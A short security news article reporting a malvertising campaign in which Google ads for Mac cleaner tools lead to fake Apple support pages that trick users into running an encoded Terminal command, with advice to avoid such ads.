Malicious Google Ads Target Mac Users With Fake “Mac Cleaner” Pages

CyberDefender 5 mins0

Mac users searching for cleanup or optimization software through Google need to be cautious — especially when ads appear at the top of the results. Researchers have recently uncovered a malicious campaign where dangerous ads are tricking people into running harmful commands on their machines.

What’s Happening?

Security researchers at MacKeeper discovered that certain sponsored Google search results — especially for keywords like “Mac cleaner” — aren’t leading to real cleanup tools. Instead, these ads send users to convincing yet fraudulent pages that look a lot like Apple’s official support pages.

These bogus pages are designed to fool users into thinking they’re legitimate troubleshooting guides — but they have a hidden goal: get you to run a harmful command in your Mac’s Terminal.

How the Scam Works

Here’s the step-by-step trick these attackers use:

  • Trusted placement: The ads show up at the top of Google search results, which makes them look legitimate.
  • Fake support pages: Clicking the ad takes you to pages styled to resemble Apple’s support documentation — even though they’re not real.
  • Instructions to run Terminal commands: You’re shown instructions to copy-paste a command into macOS Terminal. The command is hidden using Base64 encoding so it doesn’t look suspicious at first glance.
  • Malicious activity begins: When you run the command, it decodes into a script that’s downloaded and run with full permissions — giving attackers control of your Mac.

Fake messages like “Cleaning macOS Storage” appear while this is happening, tricking you into thinking the process is normal.

What the Malware Can Do

Once the hidden script runs on your Mac, attackers can use it to:

  • Steal sensitive files
  • Extract SSH keys
  • Install additional malware
  • Hijack system resources for things like cryptomining

Because the script runs with full user permissions, it basically hands over control of your Mac to the attacker.

Who’s Behind These Ads?

The investigation found that some of the ads were served from genuine Google-verified advertising accounts, suggesting attackers may have compromised those accounts rather than creating fake ones from scratch.

For example:

  • One ad came from a personal account under the name Nathaniel Josue Rodriguez
  • Another used a small business account labeled Aloha Shirt Shop

Because both of these accounts previously ran ordinary ads, researchers think the attackers took them over to bypass Google’s trust checks and reach more victims.

MacKeeper has reported the abusive ads to Google to try to get them taken down.

Bottom Line

If you’re a Mac user searching for tools online, be extra cautious with sponsored ads — especially those promising cleanup or optimization solutions. Don’t trust everything at the top of the search results, and never run a Terminal command copied from a webpage you don’t fully trust.

CyberDefender